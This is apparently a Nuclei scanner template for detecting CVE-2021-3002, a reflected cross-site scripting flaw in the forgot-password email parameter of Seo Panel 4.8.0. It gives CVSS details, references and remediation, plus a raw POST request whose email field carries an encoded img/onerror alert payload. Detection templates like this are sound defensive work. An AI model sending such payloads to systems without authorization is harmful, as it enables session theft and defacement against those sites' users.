id: CVE-2021-3002 info: name: Seo Panel 4.8.0 - Cross-Site Scripting author: edoardottt severity: medium description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor. reference: - http://www.cinquino.eu/SeoPanelReflect.htm - https://github.com/seopanel/Seo-Panel/issues/202 - https://nvd.nist.gov/vuln/detail/CVE-2021-3002 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/ArrestX/--POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-3002 cwe-id: CWE-79 epss-score: 0.00143 epss-percentile: 0.50151 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: "seopanel" product: seo_panel tags: cve2021,cve,seopanel,xss http: - raw: - | POST /seo/seopanel/login.php?sec=forgot HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login= matchers-condition: and matchers: - type: word part: header words: - "text/html" - type: word part: body words: - "" - "seopanel" condition: and - type: status status: - 200 # digest: 4a0a0047304502207872922b89deb4d4e30dde0efa9ef30c54bb0ef1d091394f09631a7fd52e9c43022100cb4b226864511a96ce4ad3068222e0a098b3713ab45c7e7232fda237659f5513:922c64590222798bb761d5b6d8e72950